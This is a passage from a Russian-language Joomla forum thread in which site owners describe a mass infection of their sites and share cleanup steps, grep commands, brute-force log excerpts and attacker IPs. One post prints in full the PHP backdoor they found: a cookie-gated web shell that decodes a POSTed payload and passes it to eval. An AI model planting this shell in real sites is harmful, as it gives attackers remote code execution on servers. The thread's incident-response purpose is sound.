[Решено] Заразились в один день 4 аккаунта по 10 сайтов - страница 6 - Безопасность сайтов на Joomla

Я так же чистый хочу на новый залить Но вопрос в том как по команде файлы заражаются и как по команде отчищаются ВОТ САМОЕ ИНТЕРЕСНОЕ
Это целое не паханое поля для антивирусников

Вот сейчас самое интересное................... код начал исчезать Не знаю что делать..... то ли радоваться то ли огорчаться

Забэкапь все сайты и залей на разные хосты, потом увишь какой, сверимся с установленными компонентами плагинами и модулями, думаю так будет проще выявить дырку

Вот сейчас самое интересное................... код начал исчезать Не знаю что делать..... то ли радоваться то ли огорчаться

Вот ведь ж ёжик!

Скажите совсем не спецу в этом вопросе. Если я тупо удалю все файлы с хостинга, а потом залью на чистое место файловый бекап, ничего страшного не приключится? Мне тут светлая мысль в голову пришла, что, заливая файлы бекапа поверх, я эти самые подозрительные php оставляю на хостинге и вскоре все начнется по новой.

Я так и делал......но через часов 5 опять зараза приходила
По этому я решил взять тестовый бесплатный хостинг на 10 дней и хочу туда перенести один сайт. В этой теме проскочила мысль, что серваки самого хостера могут быть заражены

Скажите совсем не спецу в этом вопросе. Если я тупо удалю все файлы с хостинга, а потом залью на чистое место файловый бекап, ничего страшного не приключится? Мне тут светлая мысль в голову пришла, что, заливая файлы бекапа поверх, я эти самые подозрительные php оставляю на хостинге и вскоре все начнется по новой.

Угу, заливаешь новые поверху, а сам вирус остается, он ведь в отдельных файлах которые не затираются при заливке сверху.

Прошло полдня и пока я могу сказать, что победил заразу.
1. Среди кучи разных сайтов сам вирус влез через сайт где была Joomla 2.5.8. Обновление до 2.5.11 может и поможет от последующих заражений, но при условии, что сайт будет вылечен.
2. На сайте таки были установлены и JCE и что-то от NoNumber. Удалил.
3. Скачал сайт на диск и искал тоталом текст "@base64_decode", нашлись только файлы с цифровыми или буквенно-цифровыми именами, но раскиданные по самым разным папкам сайта, нашлось около 15-20 штук.
4. Смотрел на путь и удалял файлы вручную на хостинге. Очистил кэш и куки браузера.
5. Теперь точно могу сказать, что вредный код в JS после удаления найденных вирусных .php файлов, чудесным образом исчез со всех сайтов хостинга. Но лучше проверять.
6. Пока боролся с этим вирем, выяснил, что некоторые мои сайты брутфорсят (подбирают пароли перебором) в админке Joomla с IP 82.104.148.81 (Италия). Это видно в логах сервера и даже в логах самой Joomla (папка /logs в корне сайта). Только файл лога из-за этого стал весить 8 Мб, можно представить, сколько опробовано паролей. В частности подбирают, именно тот сайт, который был заражен. Пока забанил в htaccess по IP, но как-то неприятно, да и сервер грузят своими глупыми запросами.

А пароль подбирают к админской панели или входу на фронде?

На Гогете активизировались оптимизаторы: "Здравствуйте, зашел на Ваш сайт с браузера Opera, ругается на то, что Ваш сайт замечен в мошеничестве. Проконтролируйте ситуацию или я напишу в арбитраж".
Вот ведь кому-то тоже не празднуется.  

Пришёл домой, проверил сайты, вредоносного кода нету в ява скриптах нету. Но где-то он сидит, просто самоустранился и быстрее всего на время.

На Гогете активизировались оптимизаторы: "Здравствуйте, зашел на Ваш сайт с браузера Opera, ругается на то, что Ваш сайт замечен в мошеничестве. Проконтролируйте ситуацию или я напишу в арбитраж".
Вот ведь кому-то тоже не празднуется.  

+1

Такая же беда. Уже начал терять бабло. Посещалка в минус, по контексту не кликают

На это было и рассчитано. Хакер (группа хакеров) в курсе наших праздников. Нужно лечить. Чудесные праздники людям организовали.

на всякий случай команды для поиска этой вирусни через ssh

find . -type f  -name '*.php' -exec grep -l 'if(!empty($_COOKIE' {} \;

find . -type f  -name '*.js' -exec grep -l '*214afaae*' {} \;

сам словил заразу, Яндекс сайт сильно понизил. удалил все PHP с этим кодом, JS фаылый почистил. пароли поменял. пока что полёт нормальный, мониторю логи на предмет подозрительной активности

Проще воспользоваться этим . Плюсы и пожертвования пользователю icom

Завтра подборку скриптов обновлю от специалистов форума и не форума.

А пароль подбирают к админской панели или входу на фронде?

На фронте нет входа, подбирают к админке.

Проще воспользоваться этим . Плюсы и пожертвования пользователю icom
Завтра подборку скриптов обновлю от специалистов форума и не форума.

Отличный скрипт, всегда очень помогает. Также рекомендую, тем, кто еще не пользуется.

На это было и рассчитано. Хакер (группа хакеров) в курсе наших праздников. Нужно лечить. Чудесные праздники людям организовали.

а у нас то новогодние, то майские каникулы, еще сентябрь но они про это не знают  это наша маленькая тайна

У меня один сайт заражен, вроде ничего такого подозрительного не ставил и только на нём одном стоит JA T3 плагин (шаблон верстать было в лом вот и поставил). У Вас интересно сие чудо установленно?

У меня очень много было в Ньюсшоу от Гавиков, первые версии, где мутолс или как там их.

Блин, да где-же дыра, влом БД перекидывать на чистый движок, да еще хз, вдруг эта сволочь в БД прописалась вот это будет ж..а.

Вот скачал лог моего самого посещаемого сайта, под спойлером подозрительные записи.
Запрос одинаковый но идёт кучу раз, под спойлер даже всё не уместилось. В логах других сайтов это апишника нету.

А вот нашёл ещё на другом сайте:
Там и сайта то нету, просто папка без файлов, т.е. вообще там пусто, но кто-то пытается зайти в админку Wordpressа.

тоже самое на 2х сайтах сегодня наблюдаю, логи идентичны, даже IP тот же на одном (94.137.16.193), на втором - 188.190.99.143
(только заражений нет)

на третьем
по 5-6 запросов в секунду, на потяжении 10минут

В теме написано - "Решено" а решения нет. Было у меня нечто подобное только зараза прописалась во всех index файлах. Причина была в кривой настройке сервера у хостера. Стоило переехать на другой хостинг и взлом прекратился. К слову у большинства хостеров сервера весьма убого настроены в плане безопасности. Рекомендую перенести хоть один сайт который постоянно ломают на другой хостинг и сравнить результаты.

В момент написания этого поста в логах наблюдаю попытки проникновения в админку с IP 109.163.233.194 и 88.198.205.40. Как то последнее время боты активизировались.

У меня в логах такая есть штука:

Код

[Mon Mar 25 01:07:37 2013] [warn] [client 93.189.42.ххх] mod_fcgid: stderr: PHP Notice:  Uninitialized string offset: 0 in .../administrator/components/com_modules/views/positions/2af18f28.php(5) : eval()'d code on line 72

Прошу заметить дату, версия 2.5.2

Не стал мучатся, т.к. все компоненты от NoNumber не использовались, перекинул базу на чистый 2.5.2 и обновил до 2.5.11, уже 6 часов полет нормальный.

Пробил апишник    94.137.16.193 - Country: Russian Federation, ISP: Omskie kabelnye seti Ltd., а вот и ссылочка на это дело

Вот логи..
130.185.105.141 - - [03/May/2013:23:05:27 +0400] "GET /administrator/index.php HTTP/1.0" 200 5677 "-" "h2RhH1ZsPwi3"
130.185.105.141 - - [03/May/2013:23:05:27 +0400] "POST /administrator/index.php HTTP/1.0" 200 5980 "-" "h2RhH1ZsPwi3"

130.185.105.141 - - [03/May/2013:23:08:14 +0400] "GET /administrator/index.php HTTP/1.0" 200 5677 "-" "4w 6Iw9 4K RMhE31FQ"
130.185.105.141 - - [03/May/2013:23:08:15 +0400] "POST /administrator/index.php HTTP/1.0" 200 5980 "-" "4w 6Iw9 4K RMhE31FQ"

130.185.105.141 - - [03/May/2013:23:11:09 +0400] "GET /administrator/index.php HTTP/1.0" 200 5677 "-" "7MswelAmZjwc"
130.185.105.141 - - [03/May/2013:23:11:10 +0400] "POST /administrator/index.php HTTP/1.0" 200 5980 "-" "7MswelAmZjwc"

Смущает ответ сервера 200.. Еще увидел обращение к странным *.php с этой бякой внутри ----
<?php
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
  echo '<textarea id=areatext>';
  eval($msg);
  echo '</textarea>bg';
  exit;}}?>

Нашел их все скриптом и удалил.. Но вот того, что все указывают не нашел --- /*214afaae*/(function(){ и т.д.
Да и ничего другого, что народ выкладывает нет.. хмм..

да-да.. вот про эти забыл написать.. как в сл. сообщении
j.php
jos_jarv.php

Просмотрел логи ещё 1 сайта, точнее это просто домен с которого идёт редирект через .htaccess на другой сайт:
А на том сайте на который собственно и идёт редирект обнаружил в папе images пару файлов, которых там быть не должно:
j.php
jos_jarv.php
Оба файла от 27.02.2013, но прикол в том, что я утром 4 мая производил замену на чистую копию и там это бяки не было.

Нашёл их в логе:

Также в папке с изображениями были 2 php файла:
adc8.php
6a2cd327.php

Просмотрев ещё раз лог нашёл когда последние 2 файла были залиты:

j.php
jos_jarv.php

да-да.. вот про эти забыл написать..

И ещё вдобавок лог:
Часть строк 31.223.100.170 - - [28/Apr/2013:14:22:59 +0400] "POST /administrator/index.php HTTP/1.0" 200 10399 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" пришлось удалить.

Угу, заливаешь новые поверху, а сам вирус остается, он ведь в отдельных файлах которые не затираются при заливке сверху.

Прошло полдня и пока я могу сказать, что победил заразу.
1. Среди кучи разных сайтов сам вирус влез через сайт где была Joomla 2.5.8. Обновление до 2.5.11 может и поможет от последующих заражений, но при условии, что сайт будет вылечен.
2. На сайте таки были установлены и JCE и что-то от NoNumber. Удалил.
3. Скачал сайт на диск и искал тоталом текст "@base64_decode", нашлись только файлы с цифровыми или буквенно-цифровыми именами, но раскиданные по самым разным папкам сайта, нашлось около 15-20 штук.
4. Смотрел на путь и удалял файлы вручную на хостинге. Очистил кэш и куки браузера.
5. Теперь точно могу сказать, что вредный код в JS после удаления найденных вирусных .php файлов, чудесным образом исчез со всех сайтов хостинга. Но лучше проверять.
6. Пока боролся с этим вирем, выяснил, что некоторые мои сайты брутфорсят (подбирают пароли перебором) в админке Joomla с IP 82.104.148.81 (Италия). Это видно в логах сервера и даже в логах самой Joomla (папка /logs в корне сайта). Только файл лога из-за этого стал весить 8 Мб, можно представить, сколько опробовано паролей. В частности подбирают, именно тот сайт, который был заражен. Пока забанил в htaccess по IP, но как-то неприятно, да и сервер грузят своими глупыми запросами.

Сделал вчера все по пунктам. Вроде пока ничего нет.